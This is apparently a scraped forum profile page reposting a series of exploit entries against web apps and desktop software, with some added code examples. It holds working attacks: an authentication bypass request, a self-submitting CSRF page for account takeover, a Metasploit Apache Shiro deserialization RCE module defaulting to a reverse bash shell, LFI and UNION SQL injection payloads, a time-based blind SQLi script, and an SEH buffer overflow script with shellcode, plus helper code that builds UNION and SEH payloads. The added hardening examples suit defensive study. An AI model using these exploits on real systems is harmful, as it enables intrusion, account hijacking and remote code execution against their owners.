
Everything posted by HireHackking
-
Online Scheduling System 1.0 - Authentication Bypass
# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass
# Exploit Author: Bobby Cooke
# Date: 2020-04-30
# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x86_64) + XAMPP 7.4.4

# Malicious POST request to https://TARGET/Online%20Scheduling%20System/login.php
# (username and password are both the literal value 0; no valid credentials are needed)

POST /Online%20Scheduling%20System/login.php HTTP/1.1
Host: TARGET
Connection: close
Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60

username=0&password=0&lgn=Login
-
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
# Exploit Author: Faiz Ahmed Zaidi
# Vendor Homepage: https://ofbiz.apache.org/security.html
# Software Link: https://ofbiz.apache.org/download.html#security
# Version: Before 17.12.03
# Tested on: Linux and Windows
# CVE : CVE-2019-0235

# Exploit Code:

<html>
  <body>
    <form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST">
      <input type="hidden" name="contactMechId" value="admin" />
      <input type="hidden" name="contactMechTypeId" value="EMAIL_ADDRESS" />
      <input type="hidden" name="partyId" value="admin" />
      <input type="hidden" name="DONE_PAGE" value="viewprofile?party_id=admin&partyId=admin" />
      <input type="hidden" name="emailAddress" value="attackeremail@id.com" />
      <input type="hidden" name="allowSolicitation" value="Y" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Once a logged-in admin loads this page, the form is submitted in their session and the account's e-mail address is replaced with the attacker's. After that, trigger a password reset through the "forgot password" flow: the reset now goes to the attacker-controlled address, completing the takeover.
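The PoC above works because updateEmailAddress accepts a form post that carries nothing tying the request to the victim's own page. The following is an added example, not OFBiz code, of the two server-side checks that break it: a per-session synchronizer token verified with a constant-time compare, and an Origin/Referer check against the site's own origin. SERVER_SECRET, SITE_ORIGIN, the csrf_token field name and handle_update_email are hypothetical names chosen for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical server-side secret, generated at start-up (assumption: one per deployment)
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://hostipaddress:8443"   # the host from the PoC form action


def make_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Synchronizer token bound to the session: random nonce + HMAC(secret, session:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, secret: bytes = SERVER_SECRET) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def origin_allowed(headers: dict, site: str = SITE_ORIGIN) -> bool:
    """Second layer: the Origin header (Referer as fallback) must be the site itself.
    A form auto-submitted from an attacker page carries that page's origin and is refused."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    o, s = urlsplit(origin), urlsplit(site)
    return (o.scheme, o.hostname, o.port) == (s.scheme, s.hostname, s.port)


def handle_update_email(session_id: str, form: dict, headers: dict) -> str:
    """Decision for one POST to /partymgr/control/updateEmailAddress (hypothetical handler)."""
    if not origin_allowed(headers):
        return "rejected: cross-origin request"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "rejected: missing or invalid CSRF token"
    return "updated email to " + form["emailAddress"]
```

The token must be emitted into the legitimate edit form and checked on every state-changing POST; the origin check alone is not enough on its own, because some clients strip Referer and an absent header would otherwise have to be treated as hostile.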
-
HardDrive 2.1 for iOS - Arbitrary File Upload
# Title: HardDrive 2.1 for iOS - Arbitrary File Upload
# Author: Vulnerability Laboratory
# Date: 2020-04-30
# Software: https://apps.apple.com/ch/app/harddrive/id383226784
# CVE: N/A

Document Title:
===============
HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2221

Common Vulnerability Scoring System:
====================================
7.4

Product & Service Introduction:
===============================
Store+Organize+Edit+Protect+Import+Download+View+Share your files right from your iPhone! Transform your iPhone/iPod touch into a real HardDrive with no extra cable or software.

(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 )

Affected Product(s):
====================
Sebastien BUET - HardDrive v2.1 - Apple iOS Mobile Web Application

Vulnerability Disclosure Timeline:
==================================
2020-04-29: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official HardDrive v2.1 iOS mobile application. The vulnerability allows remote attackers to upload arbitrary files and thereby compromise, for example, the file system of the service.

The arbitrary upload vulnerability is located in the upload module of the app's built-in web server. Remote attackers can bypass the local web-server restrictions by uploading a web shell: they supply their own file through a malicious `file` value in the `upload` POST request. The application does not check for multiple file extensions, so an attacker can upload, for example, a `html.js.png` file. After the upload, the attacker requests the uploaded file at the original URL with the unwanted trailing extension removed, which executes the code in the unprotected web front-end.

The security risk of the vulnerability is estimated as high with a CVSS count of 7.4. Exploitation of the web vulnerability requires a low privileged application user account and no user interaction. Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] ./upload

Vulnerable File(s):
[+] file

Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the web vulnerability, follow the provided information and steps below.

PoC: Vulnerable Source (File Dir Listing Index)

<tr>
  <td width="100px" valign="middle" align="left"><img src="exploit.html"></td>
  <td width="300px" valign="middle" align="left"><a href="exploit.html.js">exploit.html.js</a></td>
  <td width="454px" valign="middle" align="left"><em valign="middle" align="center">size: 256.7 Kb

PoC: Exploitation

http://localhost:50071/exploit.html.js

--- PoC Session Logs [POST] ---

(file) http://localhost:50071/
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9331569428946906291010349387
Content-Length: 263181
Origin: http://localhost:50071
Connection: keep-alive
Referer: http://localhost:50071/

file=exploit.html.js.png&button=Submit

POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 381654
-
http://localhost:50071/exploit.html.js
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
-
http://localhost:50071/exploit.html

GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 366735

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
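The weakness described above is a check that looks only at the final extension, so `exploit.html.js.png` passes as an image. The following is an added example, not code from the HardDrive app, showing that weak check next to a hardened one that inspects every dot-separated segment, strips any client-supplied path, allow-lists the stem and stores the file under a server-chosen random name. The ALLOWED and ACTIVE extension sets are assumptions for the example.

```python
import os
import re
import secrets

ALLOWED = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
# Extensions a web server or browser may treat as code or markup (constructed list).
ACTIVE = {"php", "phtml", "php5", "js", "html", "htm", "svg", "asp", "aspx", "jsp", "cgi", "sh", "htaccess"}


def accept_last_extension_only(filename: str) -> bool:
    """The weak check the advisory describes: only the final extension is inspected,
    so 'exploit.html.js.png' passes because it ends in .png."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def accept_hardened(filename: str) -> bool:
    """Every segment of the name is inspected, not just the last one."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop any client-supplied path
    if name.startswith(".") or name.count(".") != 1:
        return False                                       # dotfiles and multi-extension names
    stem, ext = name.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED or ext in ACTIVE:
        return False
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem) is not None


def stored_name(filename: str) -> str:
    """Store under a random server-chosen name; the client's name never reaches the disk."""
    if not accept_hardened(filename):
        raise ValueError("rejected upload name: %r" % filename)
    ext = filename.rsplit(".", 1)[-1].lower()
    return "%s.%s" % (secrets.token_hex(16), ext)
```

The random stored name also defeats the second half of the PoC, where the attacker requests the uploaded file under a shortened name: nothing on disk is derived from what the client sent.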
-
Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE',
      'Description'    => %q{
        This vulnerability allows remote attackers to execute arbitrary code on
        vulnerable installations of Apache Shiro v1.2.4.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'L / l-codes[at]qq.com' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2016-4437'],
          ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1']
        ],
      'Platform'       => %w{ win unix },
      'Arch'           => [ ARCH_CMD ],
      'Targets'        =>
        [
          [ 'Unix Command payload',
            'Arch'           => ARCH_CMD,
            'Platform'       => 'unix',
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
          ],
          [ 'Windows Command payload',
            'Arch'     => ARCH_CMD,
            'Platform' => 'win'
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 7 2016',
      'Privileged'     => false,
      'DefaultOptions' => { 'WfsDelay' => 5 }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
      ])
  end

  def aes_encrypt(payload)
    # Shiro 1.2.4 ships with this hard-coded default rememberMe cipher key.
    # The cookie format is IV || AES-128-CBC ciphertext, so the random IV is prepended.
    aes = OpenSSL::Cipher.new('aes-128-cbc')
    aes.encrypt
    aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==')
    aes.random_iv + aes.update(payload) + aes.final
  end

  def exploit
    cmd = payload.encoded
    vprint_status("Execute CMD: #{cmd}")
    type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' )
    # The server deserializes the decrypted cookie, so a ysoserial gadget chain runs the command
    java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type)
    ciphertext = aes_encrypt(java_payload)
    base64_ciphertext = Rex::Text.encode_base64(ciphertext)
    send_request_cgi({
      'uri'    => target_uri.path,
      'method' => 'GET',
      'cookie' => "rememberMe=#{base64_ciphertext}"
    })
  end
end
-
BoltWire 6.03 - Local File Inclusion
# Exploit Title: BoltWire 6.03 - Local File Inclusion
# Date: 2020-05-02
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.boltwire.com/
# Software Link: https://www.boltwire.com/downloads/go&v=6&r=03
# Version: 6.03
# Tested on: Ubuntu 20.04 LAMP

LFI:

Steps to Reproduce:

1) While logged in as an authenticated user, browse to the following page with an HTTP GET request:

http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd

Result:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
[SNIPPED]
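The `action` value above is joined onto an include directory and the `../` sequences walk out of it. The following is an added example, not BoltWire code, of that pattern next to a resolver that allow-lists the action name, appends the extension itself and confirms the normalised path is still under the base directory. The base directory path and the `.php` suffix are assumptions for the example.

```python
import os
import re

ACTION_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")
TRAVERSAL = "../../../../../../../etc/passwd"   # the value from the PoC URL


def resolve_action_vulnerable(base_dir: str, action: str) -> str:
    """The pattern the PoC implies: the parameter is joined onto the include
    directory as-is, so '../' segments escape it."""
    return os.path.join(base_dir, action)


def resolve_action_safe(base_dir: str, action: str):
    """Two independent layers: an allow-list on the name (no dots or separators at
    all) and a containment check on the normalised result. Returns None on rejection."""
    if ACTION_NAME.fullmatch(action) is None:
        return None
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, action + ".php"))
    # normpath collapses '..'; in deployed code use os.path.realpath as well so a
    # symlink inside base_dir cannot point elsewhere (assumption: base_dir exists there)
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```

The containment check is kept even though the allow-list already rejects the PoC value: if the allow-list is later loosened (dots in action names, say), the second layer still holds.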
-
Fishing Reservation System 7.5 - 'uid' SQL Injection
# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection
# Author: Vulnerability Laboratory
# Date: 2020-05-05
# Vendor: https://fishingreservationsystem.com/index.html
# Software: https://fishingreservationsystem.com/features.htm
# CVE: N/A

Document Title:
===============
Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2243

Common Vulnerability Scoring System:
====================================
7.5

Product & Service Introduction:
===============================
(Copy of the Homepage: https://fishingreservationsystem.com/index.html & https://fishingreservationsystem.com/features.htm )

Vulnerability Disclosure Timeline:
==================================
2020-05-04: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
Multiple remote SQL injection web vulnerabilities have been discovered in the official Fishing Reservation System application. The vulnerabilities allow remote attackers to inject or execute their own SQL commands to compromise the DBMS or file system of the application.

The remote SQL injection vulnerabilities are located in the `pid`, `type` and `uid` parameters of the `admin.php` control panel file, and in the `m`, `y` and `code` parameters of `calendar.php` and `modules/cart.php`. Guest accounts or low privileged user accounts are able to inject and execute their own SQL statements to compromise the local database and the affected management system. The request method to inject/execute is GET and the attack vector is client-side. The vulnerability is a classic ORDER BY / UNION SELECT remote SQL injection; the PoC below uses a 23-column UNION.

Exploitation of the remote SQL injection vulnerability requires no user interaction and a low privileged web-application user / guest account. Successful exploitation of the remote SQL injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] cart.php
[+] calendar.php
[+] admin.php

Vulnerable Parameter(s):
[+] uid
[+] pid
[+] type
[+] m
[+] y
[+] code

Proof of Concept (PoC):
=======================
The remote SQL injection web vulnerability can be exploited by remote attackers with guest access or a low privileged user account and without user interaction. For security demonstration or to reproduce the remote SQL injection web vulnerability, follow the provided information and steps below.

PoC: Example

https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]--
https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]--
https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID=
-
https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID=
https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID=
https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID=

PoC: Exploitation (SQL-Injection)

https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID=
https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
-
https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID=
https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=

PoC: Exploit

<html>
<head>
<title>Fishing Reservation System - SQL INJECTION EXPLOIT (PoC)</title>
</head>
<body>
<iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="></iframe>
<iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID="></iframe>
<iframe src="https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="></iframe>
<br>-
<iframe src="https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID="></iframe>
<iframe src="https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="></iframe>
<iframe src="https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="></iframe>
</body>
</html>

Reference(s):
https://frs.localhost:8080/
https://frs.localhost:8080/system/
https://frs.localhost:8080/system/modules/
https://frs.localhost:8080/system/admin.php
https://frs.localhost:8080/system/modules/cart.php

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
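The PoC URLs above show the end result of the UNION technique but not the steps, so the following is an added example, not code from Fishing Reservation System, that walks through them against a constructed SQLite stand-in: the string-built query the `pid` parameter implies, ORDER BY probing to find the column count, the `-1 UNION SELECT ...` payload with a chosen expression in a chosen column, and the parameterised query that makes the same payload inert. The table layout is invented, and `sqlite_version()` stands in for MySQL's `@@version`, so the UNION has 3 columns here instead of the 23 on the page.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's database (schema is invented)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(pid INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'Half-day boat', 120.0), (2, 'Pier pass', 15.0);
        CREATE TABLE users(uid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-password-hash');
    """)
    return con


def product_edit_vulnerable(con, pid: str):
    """String-built query: the 'pid' value is spliced into the SQL verbatim."""
    sql = "SELECT pid, name, price FROM products WHERE pid = " + pid
    return con.execute(sql).fetchall()


def product_edit_safe(con, pid: str):
    """Parameterised query: the value is bound, never parsed as SQL."""
    return con.execute("SELECT pid, name, price FROM products WHERE pid = ?", (pid,)).fetchall()


def count_columns(con, query, max_cols: int = 40):
    """ORDER BY probing: 'ORDER BY n' succeeds while n <= column count and errors after."""
    for n in range(1, max_cols + 1):
        try:
            query(con, "1 ORDER BY %d--" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_payload(ncols: int, position: int, expr: str, source: str = "") -> str:
    """Build '-1 UNION SELECT 1,2,...--' with `expr` placed in column `position`
    (1-based) and an optional FROM clause, the shape used in the PoC URLs."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[position - 1] = expr
    return "-1 UNION SELECT " + ",".join(cols) + ((" FROM " + source) if source else "") + "--"
```

Against the vulnerable function the payload returns the injected row; against the parameterised one the whole string is compared to `pid` as a value and matches nothing.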
-
Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Author: Xenofon Vassilakopoulos
# Date: 2020-05-03
# Version: 3.36
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Tested on: Windows 7 Professional SP1 x86

# Steps to reproduce :
# 1. generate the test.txt using this exploit
# 2. copy the contents of the test.txt to clipboard
# 3. open Frigate3 then go to Disk -> Find Computer
# 4. paste the contents to computer name
# 5. calculator will execute

import struct

filename = 'test.txt'

junk = b"A" * 4112                       # distance to the nSEH field
nseh = b"\xeb\x1A\x90\x90"               # jmp short +0x1A: over the SEH record and nop sled, into the shellcode
seh = struct.pack('<I', 0x40171c45)      # pop esi # pop ebx # ret (explicit 4-byte little-endian; native 'L' is 8 bytes on 64-bit Linux)
nop = b"\x90" * 18
junk2 = b"\x71\x71\x90\x90"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
buf = b""
buf += b"\x89\xe7\xda\xc7\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
buf += b"\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x68\x68\x6d\x52"
buf += b"\x77\x70\x63\x30\x73\x30\x35\x30\x6d\x59\x38\x65\x34"
buf += b"\x71\x69\x50\x70\x64\x4c\x4b\x56\x30\x44\x70\x6e\x6b"
buf += b"\x36\x32\x74\x4c\x6c\x4b\x30\x52\x76\x74\x4e\x6b\x71"
buf += b"\x62\x51\x38\x64\x4f\x78\x37\x42\x6a\x45\x76\x76\x51"
buf += b"\x4b\x4f\x6e\x4c\x47\x4c\x43\x51\x63\x4c\x44\x42\x36"
buf += b"\x4c\x61\x30\x6f\x31\x38\x4f\x56\x6d\x45\x51\x69\x57"
buf += b"\x38\x62\x6c\x32\x63\x62\x33\x67\x4e\x6b\x76\x32\x42"
buf += b"\x30\x4e\x6b\x50\x4a\x75\x6c\x4c\x4b\x42\x6c\x57\x61"
buf += b"\x51\x68\x6a\x43\x73\x78\x63\x31\x6a\x71\x43\x61\x6e"
buf += b"\x6b\x73\x69\x37\x50\x35\x51\x78\x53\x6e\x6b\x42\x69"
buf += b"\x65\x48\x4a\x43\x36\x5a\x51\x59\x4e\x6b\x46\x54\x4c"
buf += b"\x4b\x53\x31\x69\x46\x70\x31\x49\x6f\x4c\x6c\x4f\x31"
buf += b"\x48\x4f\x66\x6d\x45\x51\x4f\x37\x66\x58\x49\x70\x63"
buf += b"\x45\x5a\x56\x36\x63\x73\x4d\x7a\x58\x65\x6b\x63\x4d"
buf += b"\x34\x64\x44\x35\x4a\x44\x63\x68\x4c\x4b\x33\x68\x44"
buf += b"\x64\x66\x61\x38\x53\x52\x46\x4e\x6b\x34\x4c\x50\x4b"
buf += b"\x6e\x6b\x43\x68\x75\x4c\x76\x61\x6e\x33\x4e\x6b\x55"
buf += b"\x54\x6e\x6b\x53\x31\x38\x50\x4f\x79\x43\x74\x37\x54"
buf += b"\x76\x44\x51\x4b\x31\x4b\x53\x51\x36\x39\x50\x5a\x32"
buf += b"\x71\x79\x6f\x79\x70\x43\x6f\x53\x6f\x52\x7a\x4e\x6b"
buf += b"\x67\x62\x48\x6b\x4e\x6d\x43\x6d\x72\x4a\x47\x71\x6e"
buf += b"\x6d\x4d\x55\x4e\x52\x57\x70\x37\x70\x67\x70\x62\x70"
buf += b"\x32\x48\x70\x31\x6e\x6b\x32\x4f\x6c\x47\x39\x6f\x69"
buf += b"\x45\x4d\x6b\x58\x70\x4e\x55\x4d\x72\x51\x46\x30\x68"
buf += b"\x4e\x46\x6f\x65\x4d\x6d\x6d\x4d\x6b\x4f\x39\x45\x45"
buf += b"\x6c\x33\x36\x53\x4c\x37\x7a\x4b\x30\x49\x6b\x49\x70"
buf += b"\x32\x55\x45\x55\x6d\x6b\x33\x77\x44\x53\x42\x52\x50"
buf += b"\x6f\x43\x5a\x67\x70\x33\x63\x4b\x4f\x59\x45\x42\x43"
buf += b"\x65\x31\x52\x4c\x45\x33\x35\x50\x41\x41"

payload = junk + nseh + seh + nop + junk2 + buf

print("[+] Creating file %s" % filename)
with open(filename, 'wb') as f:
    f.write(payload)
print(" File created, wrote %d bytes to file" % len(payload))
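The exploit above hard-codes the short-jump displacement (0x1A) and trusts that the handler address avoids the bad characters. The following is an added example, not the author's code, that builds the same junk | nSEH | SEH | nop-sled | shellcode layout while computing the jump from the layout, checking every executed byte against the bad-character list from the msfvenom line, and simulating where execution lands after the pop/pop/ret returns into nSEH. The shellcode is a constructed INT3 filler; the offset and handler address are the ones on the page.

```python
import struct

BAD_CHARS = b"\x00\x14\x09\x0a\x0d"        # the -b list from the msfvenom command above


def short_jmp(skip: int) -> bytes:
    """EB xx: jump `skip` bytes past the end of the 2-byte instruction."""
    if not 0 <= skip <= 0x7F:
        raise ValueError("short jmp can only skip 0..127 bytes forward")
    return b"\xeb" + bytes([skip])


def handler_is_clean(handler: int, bad: bytes = BAD_CHARS) -> bool:
    """True when the little-endian encoding of the SEH handler address has no bad chars."""
    return not any(b in bad for b in struct.pack("<I", handler))


def check_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> None:
    hits = sorted({b for b in data if b in bad})
    if hits:
        raise ValueError("bad chars present: " + ", ".join("0x%02x" % b for b in hits))


def build_seh_payload(offset: int, handler: int, shellcode: bytes, sled: int = 18) -> bytes:
    """junk | nSEH (jmp short + 2 nops) | SEH (pop/pop/ret) | nop sled | shellcode.
    The displacement is derived from the layout rather than typed in by hand."""
    seh = struct.pack("<I", handler)          # explicit 4-byte little-endian, never native 'L'
    skip = 2 + len(seh) + sled                # bytes between the end of the jmp and the shellcode
    nseh = short_jmp(skip) + b"\x90\x90"
    tail = nseh + seh + b"\x90" * sled + shellcode
    check_bad_chars(tail)                     # the junk is never executed, so only the tail matters
    return b"A" * offset + tail


def landing_index(payload: bytes, offset: int) -> int:
    """Index where execution resumes after pop/pop/ret returns into nSEH at `offset`."""
    if payload[offset] != 0xEB:
        raise ValueError("nSEH does not start with a short jmp")
    disp = payload[offset + 1]
    disp = disp - 256 if disp > 127 else disp
    return offset + 2 + disp


def demo() -> bytes:
    """The page's offset and handler with a constructed INT3 filler as shellcode."""
    return build_seh_payload(4112, 0x40171c45, b"\xcc" * 32)
```

With the page's numbers the computed displacement is 0x18, two bytes shorter than the exploit's 0x1A: the original jump lands on the trailing NOPs of junk2 and slides into the shellcode, which works but leaves less margin than landing on the shellcode directly.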
-
addressbook 9.0.0.1 - 'id' SQL Injection
# Title: addressbook 9.0.0.1 - 'id' SQL Injection
# Date: 2020-04-01
# Author: David Velazquez a.k.a. d4sh&r000
# Vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download
# Vulnerable version: 9.0.0.1
# Description: addressbook 9.0.0.1 time-based blind SQL injection
# Tested On: Ubuntu Server 20.04 LTS
# Platform: PHP
# Type: webapp
# Use:
#   python addressbook9-SQLi.py http://127.0.0.1/photo.php?id=1
#   (the script appends the quote and the SLEEP() payload to the id value itself)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests


def isVulnerable(URL):
    """Check if the URL is vulnerable to time-based blind SQL injection."""
    # Appends: ' AND (SELECT 7812 FROM (SELECT(SLEEP(5)))MkTv) AND 'nRZy'='nRZy
    response = requests.get(URL + '%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
    s = response.elapsed.total_seconds()
    if s > 5:  # the injected SLEEP(5) has to show up in the response time
        sys.stdout.write('[+] Application is vulnerable!!!\n')
    else:
        sys.stdout.write('[+] Application NOT vulnerable\n')


if __name__ == "__main__":
    isVulnerable(sys.argv[1])
-
Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path
# Exploit Title: Outline Service 1.3.3 - 'Outline Service' Unquoted Service Path
# Discovery by: Minh Tuan - SunCSR
# Discovery Date: 2020-05-03
# Vendor Homepage: https://getoutline.org/vi/home
# Software Link : https://raw.githubusercontent.com/Jigsaw-Code/outline-releases/master/client/stable/Outline-Client.exe
# Tested Version: 1.3.3
